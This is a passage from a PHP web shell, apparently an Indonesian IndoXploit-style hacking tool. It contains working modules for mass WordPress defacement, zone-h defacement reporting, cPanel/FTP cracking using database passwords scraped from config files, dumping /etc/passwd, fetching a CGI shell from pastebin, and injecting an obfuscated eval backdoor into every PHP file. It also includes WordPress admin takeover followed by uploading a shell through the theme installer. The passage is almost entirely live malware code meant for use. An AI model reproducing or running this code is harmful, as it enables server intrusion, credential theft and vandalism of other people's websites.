3418. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
3419. }
3420. if(!$update OR !$conn OR !$db) {
3421. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
3422. } else {
3423. echo "<font color=lime>sukses di ganti.</font><br>";
3424. }
3425. echo "</div>";
3426. mysql_close($conn);
3427. }
3428. }
3429. } else {
3430. echo "<center>
3431. <h1>Auto Edit Title+Content WordPress</h1>
3432. <form method='post'>
3433. DIR Config: <br>
3434. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
3435. Set Title: <br>
3436. <input type='text' name='new_title' value='Hacked By 0x1999' placeholder='New Title'><br><br>
3437. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
3438. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
3439. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
3440. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
3441. </form>
3442. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
3443. ";
3444. }
3445. } elseif($_GET['do'] == 'zoneh') {
3446. if($_POST['submit']) {
3447. $domain = explode("\r\n", $_POST['url']);
3448. $nick = $_POST['nick'];
3449. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
3450. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
3451. function zoneh($url,$nick) {
3452. $ch = curl_init("http://www.zone-h.com/notify/single");
3453. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
3454. curl_setopt($ch, CURLOPT_POST, true);
3455. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
3456. return curl_exec($ch);
3457. curl_close($ch);
3458. }
3459. foreach($domain as $url) {
3460. $zoneh = zoneh($url,$nick);
3461. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
3462. echo "$url -> <font color=lime>OK</font><br>";
3463. } else {
3464. echo "$url -> <font color=red>ERROR</font><br>";
3465. }
3466. }
3467. } else {
3468. echo "<center><form method='post'>
3469. <u>Defacer</u>: <br>
3470. <input type='text' name='nick' size='50' value='0x1999'><br>
3471. <u>Domains</u>: <br>
3472. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
3473. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
3474. </form>";
3475. }
3476. echo "</center>";
3477. }elseif($_GET['do'] == 'cpftp_auto') {
3478. if($_POST['crack']) {
3479. $usercp = explode("\r\n", $_POST['user_cp']);
3480. $passcp = explode("\r\n", $_POST['pass_cp']);
3481. $i = 0;
3482. foreach($usercp as $ucp) {
3483. foreach($passcp as $pcp) {
3484. if(@mysql_connect('localhost', $ucp, $pcp)) {
3485. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
3486. } else {
3487. $_SESSION[$ucp] = "1";
3488. $_SESSION[$pcp] = "1";
3489. if($ucp == '' || $pcp == '') {
3490. //
3491. } else {
3492. echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
3493. $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
3494. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
3495. if((!$ftp_login) || (!$ftp_conn)) {
3496. echo "[+] <font color=red>Login Gagal</font><br><br>";
3497. } else {
3498. echo "[+] <font color=lime>Login Sukses</font><br>";
3499. $fi = htmlspecialchars($_POST['file_deface']);
3500. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
3501. if($deface) {
3502. $i++;
3503. echo "[+] <font color=lime>Deface Sukses</font><br>";
3504. if(function_exists('posix_getpwuid')) {
3505. $domain_cp = file_get_contents("/etc/named.conf");
3506. if($domain_cp == '') {
3507. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
3508. } else {
3509. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
3510. foreach($domains_cp[1] as $dj) {
3511. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
3512. $user_cp_url = $user_cp_url['name'];
3513. if($user_cp_url == $ucp) {
3514. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
3515. break;
3516. }
3517. }
3518. }
3519. } else {
3520. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
3521. }
3522. } else {
3523. echo "[-] <font color=red>Deface Gagal</font><br><br>";
3524. }
3525. }
3526. //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
3527. }
3528. }
3529. }
3530. }
3531. }
3532. if($i == 0) {
3533. } else {
3534. echo "<br>Sukses Deface ".$i." Cpanel by <font color=lime>JanCox.</font>";
3535. }
3536. } else {
3537. echo "<center>
3538. <form method='post'>
3539. Filename: <br>
3540. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
3541. Deface Page: <br>
3542. <input type='text' name='deface' placeholder='http://www.web-yang-udah-do-deface.com/filemu.php' style='width: 450px;'><br>
3543. USER: <br>
3544. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
3545. $_usercp = fopen("/etc/passwd","r");
3546. while($getu = fgets($_usercp)) {
3547. if($getu == '' || !$_usercp) {
3548. echo "<font color=red>Can't read /etc/passwd</font>";
3549. } else {
3550. preg_match_all("/(.*?):x:/", $getu, $u);
3551. foreach($u[1] as $user_cp) {
3552. if(is_dir("/home/$user_cp/public_html")) {
3553. echo "$user_cp\n";
3554. }
3555. }
3556. }
3557. }
3558. echo "</textarea><br>
3559. PASS: <br>
3560. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
3561. function cp_pass($dir) {
3562. $pass = "";
3563. $dira = scandir($dir);
3564. foreach($dira as $dirb) {
3565. if(!is_file("$dir/$dirb")) continue;
3566. $ambil = file_get_contents("$dir/$dirb");
3567. if(preg_match("/WordPress/", $ambil)) {
3568. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
3569. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
3570. $pass .= ambilkata($ambil,"password = '","'")."\n";
3571. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
3572. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
3573. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
3574. $pass .= ambilkata($ambil,'password = "','"')."\n";
3575. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
3576. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
3577. } elseif(preg_match("/client/", $ambil)) {
3578. preg_match("/password=(.*)/", $ambil, $pass1);
3579. if(preg_match('/"/', $pass1[1])) {
3580. $pass1[1] = str_replace('"', "", $pass1[1]);
3581. $pass .= $pass1[1]."\n";
3582. }
3583. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
3584. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
3585. }
3586. }
3587. echo $pass;
3588. }
3589. $cp_pass = cp_pass($dir);
3590. echo $cp_pass;
3591. echo "</textarea><br>
3592. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
3593. </form>
3594. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
3595. }
3596. }
3597. elseif($_GET['do'] == 'cgi') {
3598. $cgi_dir = mkdir('idx_cgi', 0755);
3599. $file_cgi = "idx_cgi/cgi.izo";
3600. $isi_htcgi = "AddHandler cgi-script .izo";
3601. $htcgi = fopen(".htaccess", "w");
3602. $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
3603. $cgi = fopen($file_cgi, "w");
3604. fwrite($cgi, $cgi_script);
3605. fwrite($htcgi, $isi_htcgi);
3606. chmod($file_cgi, 0755);
3607. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
3608. } elseif($_GET['do'] == 'fake_root') {
3609. ob_start();
3610. function reverse($url) {
3611. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
3612. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
3613. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
3614. curl_setopt($ch, CURLOPT_HEADER, 0);
3615. curl_setopt($ch, CURLOPT_POST, 1);
3616. $resp = curl_exec($ch);
3617. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
3618. $array = explode(",,", $resp);
3619. unset($array[0]);
3620. foreach($array as $lnk) {
3621. $lnk = "http://$lnk";
3622. $lnk = str_replace(",", "", $lnk);
3623. echo $lnk."\n";
3624. ob_flush();
3625. flush();
3626. }
3627. curl_close($ch);
3628. }
3629. function cek($url) {
3630. $ch = curl_init($url);
3631. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
3632. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
3633. $resp = curl_exec($ch);
3634. return $resp;
3635. }
3636. $cwd = getcwd();
3637. $ambil_user = explode("/", $cwd);
3638. $user = $ambil_user[2];
3639. if($_POST['reverse']) {
3640. $site = explode("\r\n", $_POST['url']);
3641. $file = $_POST['file'];
3642. foreach($site as $url) {
3643. $cek = cek("$url/~$user/$file");
3644. if(preg_match("/hacked/i", $cek)) {
3645. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
3646. }
3647. }
3648. } else {
3649. echo "<center><form method='post'>
3650. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
3651. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
3652. Domain: <br>
3653. <textarea style='width: 450px; height: 250px;' name='url'>";
3654. reverse($_SERVER['HTTP_HOST']);
3655. echo "</textarea><br>
3656. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
3657. </form><br>
3658. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
3659. }
3660. } elseif($_GET['do'] == 'adminer') {
3661. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
3662. function adminer($url, $isi) {
3663. $fp = fopen($isi, "w");
3664. $ch = curl_init();
3665. curl_setopt($ch, CURLOPT_URL, $url);
3666. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
3667. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
3668. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
3669. curl_setopt($ch, CURLOPT_FILE, $fp);
3670. return curl_exec($ch);
3671. curl_close($ch);
3672. fclose($fp);
3673. ob_flush();
3674. flush();
3675. }
3676. if(file_exists('adminer.php')) {
3677. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
3678. } else {
3679. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
3680. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
3681. } else {
3682. echo "<center><font color=red>gagal buat file adminer</font></center>";
3683. }
3684. }
3685. }elseif($_GET['do'] == 'injectcode') {?><center>
3686. <form method='POST'>
3687. <table>
3688. <tr>
3689. <td width="100" class="title">
3690. Directory
3691. </td>
3692. <td>
3693. <input type='text' style="width: 400px;" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
3694. </td>
3695.  
3696. </tr>
3697. <tr>
3698. <td class="title">
3699. Mode
3700. </td>
3701. <td>
3702. <select style="width: 400px;" name="mode" class="box">
3703. <option value="Apender">Apender</option>
3704. <option value="Overwriter">Overwriter</option>
3705. </select>
3706. </td>
3707. </tr>
3708. <tr>
3709. <td class="title">
3710. File Type
3711. </td>
3712. <td>
3713. <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
3714. </td>
3715. </tr>
3716. <tr>
3717. <td>Create A backdoor by injecting this code in every php file of current directory</td>
3718. </tr>
3719.  
3720. <tr>
3721. <td colspan="2">
3722. <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode("PD9waHANCmV2YWwoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoInkwelRVSWwzZHcySlZrcFVpdFdzVGkxTHpORklyOHJNUzh0SkxFblZTRW9zVGpVemlVOUpUYzVQU2RWSXk4eEpqVTlQTFlsUHpzOHJTYzByS2RaUXlpZ3BLYkRTMXk5SUxDNUpUY3JNMDB2T3o5VXZTaXpYVC9VemN5d3NUTXhXMGdRQzYxb0EiKSkpOw0KPz4="); ?></textarea>
3723. </td>
3724. </tr>
3725. <tr>
3726. <td rowspan="2">
3727. <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="submit" class="but" value="Inject "/>
3728. </td>
3729. </tr>
3730. </form>
3731. </table><div id="showinject"</div> <?php
3732. $filetype = $_POST['filetype'];
3733. $mode = "a";
3734. if($_POST['mode'] == 'Apender')
3735. $mode = "a";
3736. if($_POST['mode'] == 'Overwriter')
3737. $mode = "w";
3738. if (is_dir($_POST['pathtomass']))
3739. {
3740. $lolinject = $_POST['injectthis'];
3741. $mypath = $_POST['pathtomass'] .$directorysperator. "*.".$filetype;
3742. if(substr($_POST['pathtomass'], -1) == "\\")
3743. $mypath = $_POST['pathtomass'] . "*.".$filetype;
3744. foreach (glob($mypath) as $injectj00)
3745. {
3746. if($injectj00 == __FILE__)
3747. continue;
3748. $fp=fopen($injectj00,$mode);
3749. if (fputs($fp,$lolinject))
3750. echo '<br><font class=txt size=3>'.$injectj00.' was injected<br></font>';
3751. else
3752. echo 'failed to inject '.$injectj00.'<br>';
3753. }
3754. }
3755. else
3756. echo '<b>'.$_POST['pathtomass'].' is not available!</b>';
3757. }
3758.  
3759. elseif($_GET['do'] == 'passwbypass') {
3760. echo '<center>Bypass etc/passw With:<br>
3761. <table style="width:50%">
3762. <tr>
3763. <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
3764. <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
3765. <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>
3766. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>
3767. <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
3768. </tr></table>Bypass User With : <table style="width:50%">
3769. <tr>
3770. <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
3771. <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
3772. <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>
3773. <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>
3774. <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
3775. </tr>
3776. </table><br>';
3777.  
3778.  
3779. if ($_POST['awkuser']) {
3780. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3781. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
3782. echo "</textarea><br>";
3783. }
3784. if ($_POST['systuser']) {
3785. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3786. echo system("ls /var/mail");
3787. echo "</textarea><br>";
3788. }
3789. if ($_POST['passthuser']) {
3790. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3791. echo passthru("ls /var/mail");
3792. echo "</textarea><br>";
3793. }
3794. if ($_POST['exuser']) {
3795. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3796. echo exec("ls /var/mail");
3797. echo "</textarea><br>";
3798. }
3799. if ($_POST['shexuser']) {
3800. echo"<textarea class='inputzbut' cols='65' rows='15'>";
3801. echo shell_exec("ls /var/mail");
3802. echo "</textarea><br>";
3803. }
3804. if($_POST['syst'])
3805. {
3806. echo"<textarea class='inputz' cols='65' rows='15'>";
3807. echo system("cat /etc/passwd");
3808. echo"</textarea><br><br><b></b><br>";
3809. }
3810. if($_POST['passth'])
3811. {
3812. echo"<textarea class='inputz' cols='65' rows='15'>";
3813. echo passthru("cat /etc/passwd");
3814. echo"</textarea><br><br><b></b><br>";
3815. }
3816. if($_POST['ex'])
3817. {
3818. echo"<textarea class='inputz' cols='65' rows='15'>";
3819. echo exec("cat /etc/passwd");
3820. echo"</textarea><br><br><b></b><br>";
3821. }
3822. if($_POST['shex'])
3823. {
3824. echo"<textarea class='inputz' cols='65' rows='15'>";
3825. echo shell_exec("cat /etc/passwd");
3826. echo"</textarea><br><br><b></b><br>";
3827. }
3828. echo '<center>';
3829. if($_POST['melex'])
3830. {
3831. echo"<textarea class='inputz' cols='65' rows='15'>";
3832. for($uid=0;$uid<60000;$uid++){
3833. $ara = posix_getpwuid($uid);
3834. if (!empty($ara)) {
3835. while (list ($key, $val) = each($ara)){
3836. print "$val:";
3837. }
3838. print "\n";
3839. }
3840. }
3841. echo"</textarea><br><br>";
3842. }
3843. //
3844.  
3845. //
3846. } elseif($_GET['do'] == 'auto_dwp') {
3847. if($_POST['auto_deface_wp']) {
3848. function anucurl($sites) {
3849. $ch = curl_init($sites);
3850. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3851. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3852. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3853. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
3854. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3855. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3856. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3857. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3858. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
3859. $data = curl_exec($ch);
3860. curl_close($ch);
3861. return $data;
3862. }
3863. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
3864. $post = array(
3865. "log" => "$userr",
3866. "pwd" => "$pass",
3867. "rememberme" => "forever",
3868. "wp-submit" => "$wp_submit",
3869. "redirect_to" => "$web",
3870. "testcookie" => "1",
3871. );
3872. $ch = curl_init($cek);
3873. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3874. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3875. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3876. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3877. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3878. curl_setopt($ch, CURLOPT_POST, 1);
3879. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
3880. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3881. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3882. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
3883. $data = curl_exec($ch);
3884. curl_close($ch);
3885. return $data;
3886. }
3887. $scan = $_POST['link_config'];
3888. $link_config = scandir($scan);
3889. $script = htmlspecialchars($_POST['script']);
3890. $user = "0x1999";
3891. $pass = "0x1999";
3892. $passx = md5($pass);
3893. foreach($link_config as $dir_config) {
3894. if(!is_file("$scan/$dir_config")) continue;
3895. $config = file_get_contents("$scan/$dir_config");
3896. if(preg_match("/WordPress/", $config)) {
3897. $dbhost = ambilkata($config,"DB_HOST', '","'");
3898. $dbuser = ambilkata($config,"DB_USER', '","'");
3899. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
3900. $dbname = ambilkata($config,"DB_NAME', '","'");
3901. $dbprefix = ambilkata($config,"table_prefix = '","'");
3902. $prefix = $dbprefix."users";
3903. $option = $dbprefix."options";
3904. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
3905. $db = mysql_select_db($dbname);
3906. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
3907. $result = mysql_fetch_array($q);
3908. $id = $result[ID];
3909. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
3910. $result2 = mysql_fetch_array($q2);
3911. $target = $result2[option_value];
3912. if($target == '') {
3913. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
3914. } else {
3915. echo "[+] $target <br>";
3916. }
3917. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
3918. if(!$conn OR !$db OR !$update) {
3919. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
3920. mysql_close($conn);
3921. } else {
3922. $site = "$target/wp-login.php";
3923. $site2 = "$target/wp-admin/theme-install.php?upload";
3924. $b1 = anucurl($site2);
3925. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
3926. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
3927. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
3928. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
3929. $www = "m.php";
3930. $fp5 = fopen($www,"w");
3931. fputs($fp5,$upload3);
3932. $post2 = array(
3933. "_wpnonce" => "$anu2",
3934. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
3935. "themezip" => "@$www",
3936. "install-theme-submit" => "Install Now",
3937. );
3938. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
3939. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3940. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3941. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3942. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
3943. curl_setopt($ch, CURLOPT_POST, 1);
3944. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
3945. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
3946. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
3947. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
3948. $data3 = curl_exec($ch);
3949. curl_close($ch);
3950. $y = date("Y");
3951. $m = date("m");
3952. $namafile = "id.php";
3953. $fpi = fopen($namafile,"w");
3954. fputs($fpi,$script);
3955. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
3956. curl_setopt($ch6, CURLOPT_POST, true);
3957. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
3958. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
3959. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
3960. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
3961. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
3962. $postResult = curl_exec($ch6);
3963. curl_close($ch6);
3964. $as = "$target/k.php";
3965. $bs = anucurl($as);
3966. if(preg_match("#$script#is", $bs)) {
3967. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
3968. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
3969. } else {
3970. echo "[-] <font color='red'>gagal mepes...</font><br>";
3971. echo "[!!] coba aja manual: <br>";
3972. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
3973. echo "[+] username: <font color=lime>$user</font><br>";
3974. echo "[+] password: <font color=lime>$pass</font><br><br>";
3975. }
3976. mysql_close($conn);
3977. }
3978. }
3979. }
3980. } else {
3981. echo "<center><h1>WordPress Auto Deface</h1>
3982. <form method='post'>
3983. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
3984. <input type='text' name='script' height='10' size='50' placeholder='Hacked By 0x1999' required><br>
3985. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
3986. </form>
3987. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
3988. </center>";
3989. }
3990. } elseif($_GET['do'] == 'auto_dwp2') {
3991. if($_POST['auto_deface_wp']) {
3992. function anucurl($sites) {
3993. $ch = curl_init($sites);
3994. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
3995. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
3996. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
3997. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
3998. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
3999. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
4000. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
4001. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
4002. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
4003. $data = curl_exec($ch);
4004. curl_close($ch);
4005. return $data;
4006. }
4007. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
4008. $post = array(
4009. "log" => "$userr",
4010. "pwd" => "$pass",
4011. "rememberme" => "forever",
4012. "wp-submit" => "$wp_submit",
4013. "redirect_to" => "$web",
4014. "testcookie" => "1",
4015. );
4016. $ch = curl_init($cek);
4017. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
4018. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
4019. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
4020. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
4021. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
4022. curl_setopt($ch, CURLOPT_POST, 1);
4023. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
4024. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
4025. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
4026. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
4027. $data = curl_exec($ch);
4028. curl_close($ch);
4029. return $data;
4030. }
4031. $link = explode("\r\n", $_POST['link']);
4032. $script = htmlspecialchars($_POST['script']);
4033. $user = "indoxploit";
4034. $pass = "indoxploit";
4035. $passx = md5($pass);
4036. foreach($link as $dir_config) {
4037. $config = anucurl($dir_config);
4038. $dbhost = ambilkata($config,"DB_HOST', '","'");
4039. $dbuser = ambilkata($config,"DB_USER', '","'");
4040. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
4041. $dbname = ambilkata($config,"DB_NAME', '","'");
4042. $dbprefix = ambilkata($config,"table_prefix = '","'");
4043. $prefix = $dbprefix."users";
4044. $option = $dbprefix."options";
4045. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
4046. $db = mysql_select_db($dbname);
4047. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
4048. $result = mysql_fetch_array($q);
4049. $id = $result[ID];
4050. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
4051. $result2 = mysql_fetch_array($q2);
4052. $target = $result2[option_value];
4053. if($target == '') {
4054. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
4055. } else {
4056. echo "[+] $target <br>";
4057. }
4058. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
4059. if(!$conn OR !$db OR !$update) {
4060. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
4061. mysql_close($conn);
4062. } else {
4063. $site = "$target/wp-login.php";
4064. $site2 = "$target/wp-admin/theme-install.php?upload";
4065. $b1 = anucurl($site2);
4066. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
4067. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
4068. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
4069. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
4070. $www = "m.php";
4071. $fp5 = fopen($www,"w");
